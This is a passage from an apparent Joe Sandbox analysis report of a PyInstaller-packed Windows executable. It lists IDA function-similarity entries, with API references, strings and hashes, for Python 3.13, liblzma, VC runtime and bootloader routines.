• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
• Instruction ID: 8a73e7bb8976d04809ad3fe8a4c7c1b5a068a81604ddb3850d1a07ef3e2e945e
• Opcode Fuzzy Hash: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
• Instruction Fuzzy Hash: E6116A24A0D6D692FB6CB32156811BDE2865F447A0FD48338E93E477EADE2CE50183A0
APIs
• PyLong_FromUnsignedLongLong.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610410
• PyUnicode_InternFromString.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610421
• PyDict_SetItem.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61043C
• _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB6155EE
• _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB615607
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: DeallocFromLong$Dict_InternItemLong_StringUnicode_Unsigned
• String ID:
• API String ID: 252187852-0
• Opcode ID: cff6a4c6c921c4aa18eb5cea96de9df1f51ffc9f636274f994427a340c938c1a
• Instruction ID: 84732fc2194cff1de14ea519d2bd8335d19dedbd95af22d9753f82fd826c1d59
• Opcode Fuzzy Hash: cff6a4c6c921c4aa18eb5cea96de9df1f51ffc9f636274f994427a340c938c1a
• Instruction Fuzzy Hash: E211EFA2D1C642C5EA294B3AED55238B294FF49B91F04A130DB0F56AB5DF6CD8818309
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: abort$CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 2889003569-2084237596
• Opcode ID: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
• Instruction ID: 32a04d07e8fc886709efd6009a1a07d89ad0c63303fa4733b205377288bd1102
• Opcode Fuzzy Hash: d60a8ffad84e6f064a5763a2c166d11077ba1814d2ca81799213d95430020a2c
• Instruction Fuzzy Hash: 4691AFF7B087828AE710DB78E4442AD7BA0FB44788F14412AEB8D17B55DF38D195CB04
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
• API String ID: 2943138195-757766384
• Opcode ID: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
• Instruction ID: 2af6ef62481aaa30c42dccf6a0a752c540425fa3aecc534c12a8c9be662f946e
• Opcode Fuzzy Hash: 130e2d842e8b7dca47c2836e89f717505be4afbf408c40d13b3259f38f6b460e
• Instruction Fuzzy Hash: 657145FAB08A4298FB14CB79D8481BC77A4FB15784F884635DB6D02A98DF3CE561C708
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBBCD42DDA
                                                                                                                                                                                                        • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD42F2F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$__except_validate_context_record
                                                                                                                                                                                                      • String ID: $csm$csm
                                                                                                                                                                                                      • API String ID: 3000080923-1512788406
                                                                                                                                                                                                      • Opcode ID: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
                                                                                                                                                                                                      • Instruction ID: 09a4c621daa88f0d8215c96974141ba64765c7cb065af55a85db550c4cda9673
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53f907965be1a88a6fd5fb15d1f71a23af454141565bf2445c328556a8274992
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40719EFAB0868186DB61CF3AD4487B97BA0EB04B96F548135EB4D57A89CF2CD491C708
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBBCD42BB0
                                                                                                                                                                                                        • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD42C7F
                                                                                                                                                                                                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFBBCD42C8F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Frameabort$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                      • API String ID: 1245442199-3733052814
                                                                                                                                                                                                      • Opcode ID: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                      • Instruction ID: ee87a2ba27888e8e2c9aa27c9da56bf77eb84c3d5c69345c1538a8cbd4db377f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20a4f0483044e05ead07b9216d24a097e489e06d9183abde2aaa2290edabb471
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B617CFAB082828AEB64CF39D44836877A0EB54B96F144135DB9D83B95CF7CE491C709
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                      • API String ID: 2889003569-2084237596
                                                                                                                                                                                                      • Opcode ID: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                      • Instruction ID: 8d2561718064e4dbda3ac022c0e77f5a310d2435d17a65db3916f619199ce056
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9aa894c3c893ab74ee705d7221e0eb3435fed3f33ad5ca95d206f26215c5ec13
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5761A1B6B08BC581E720CF29E4443AAB7A0FB94B94F044225EB8C53B99DF7CD190CB04
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileHeader
                                                                                                                                                                                                      • String ID: MOC$RCC$csm$csm
                                                                                                                                                                                                      • API String ID: 104395404-1441736206
                                                                                                                                                                                                      • Opcode ID: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                      • Instruction ID: 2e2d946daf96354ac0cc91f5ccb6e3bcacea041ad790b1b1f5471a70bf2fbb6d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2941d08898c29ec0b938c5700553895786508ed6a70616e0c5efaebfc34f81
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 475178FAB0968287EA60DF39D15813A27A0FF44B94F044139EF8D57795DF3CE8A18609
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: combined CRCs: stored = 0x%08x, computed = 0x%08x$ {0x%08x, 0x%08x}
                                                                                                                                                                                                      • API String ID: 0-2474432645
                                                                                                                                                                                                      • Opcode ID: e53ea50466aa9b22fc735f0e332c3c90fe13b21c106dd576f877e05a55725f8c
                                                                                                                                                                                                      • Instruction ID: 637bbb874a788c8a4ba45acb514a7178721c811ccb6474c24f5d323a2d2054e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e53ea50466aa9b22fc735f0e332c3c90fe13b21c106dd576f877e05a55725f8c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4415EB3E0854286EB648B3CD85167CA294FB45B58F189235DB0F8B2E5DE7CAC41C718
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                      • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                      • Instruction ID: 42dd674dd24792ac39509d55fb4ee60895bc35c055690b4fa890fb0b15b52b89
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331F822B196C152EB20B761B8416E6A694BF887D4F800231EEBD83795EF7CD546C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PySequence_Size.PYTHON313(00000000,00000000,00007FFBAADC81F0,00007FFBBB6104A0), ref: 00007FFBBB610515
                                                                                                                                                                                                      • PySequence_GetItem.PYTHON313 ref: 00007FFBBB610548
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyMapping_Check.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB6105EC
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyMapping_GetOptionalItemString.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB61060B
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610627
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB6105D4: PyErr_Occurred.PYTHON313(?,?,?,?,00000000,00000000,?,00007FFBBB610564), ref: 00007FFBBB610643
                                                                                                                                                                                                      • PyErr_Format.PYTHON313 ref: 00007FFBBB615639
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_ItemLongMapping_Sequence_$CheckFormatLong_OccurredOptionalSizeStringUnsigned
                                                                                                                                                                                                      • String ID: Too many filters - liblzma supports a maximum of %d
                                                                                                                                                                                                      • API String ID: 2761522206-2617632755
                                                                                                                                                                                                      • Opcode ID: 1c904a72a4fd53edba76b9fdc25c7159333992813b3e46335f3bbba8fb89e293
                                                                                                                                                                                                      • Instruction ID: 570e24a109d9a710be7fbce90f74e6e55e21b9ee1955f37340c872ac68a04208
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c904a72a4fd53edba76b9fdc25c7159333992813b3e46335f3bbba8fb89e293
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A214FA1E0960249EA549A3AEE05175B650BB45BF4F14E731EF3F466F1DE3CE8418308
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                      • Opcode ID: 1d12e5fd0a1cbb3074b4bf47f9af303a8c6acd8ffc361fc9321cf3165f3dca45
                                                                                                                                                                                                      • Instruction ID: e80e6ccd7687d2ee56b7cac09bab08abe4f8a49e2eae157f4c834f43a8af26d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d12e5fd0a1cbb3074b4bf47f9af303a8c6acd8ffc361fc9321cf3165f3dca45
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318672609AC289EB24EF61F8552F9A760FF89784F840235EA6D47B95DF3CD101C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatOccurred
                                                                                                                                                                                                      • String ID: Invalid compression preset: %u$Invalid filter chain for FORMAT_ALONE - must be a single LZMA1 filter
                                                                                                                                                                                                      • API String ID: 4038069558-4068623215
                                                                                                                                                                                                      • Opcode ID: ba08bee32d3df14b21647ff01dcbdff88e72d6a4aa53834d0e24541db547eaa9
                                                                                                                                                                                                      • Instruction ID: c02e9fefbcf80eecd5a1c248a13193224cece82b4d6189eeaa9056849214a154
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba08bee32d3df14b21647ff01dcbdff88e72d6a4aa53834d0e24541db547eaa9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF212191A18A4641EA609B3DEC81379B250FF89BA4F50E231DB5F466F5EE2CDD058704
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7FF58918F,?,00007FF7FF583C55), ref: 00007FF7FF582BA0
                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7FF582C2A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                      • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                      • Instruction ID: f4714e97318661e080f529a998005d688af2b1446776263923478a69a62d1afc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B021E562709B8192E710AB14F8447EAB7A4FB887C0F800232EEAD57795DF3CD215C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7FF581B99), ref: 00007FF7FF582760
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                      • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction ID: 23891c94ccfbae8f1ee5ef28d63340dbc9028809e5bc62b8d3717c2ebc8fd39f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21A172A197C192EB20EB51B8817E6A7A4FB88384F800231EEAD53699DF7CD545C790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arg_$KeywordsModuleModule_PositionalStateType_
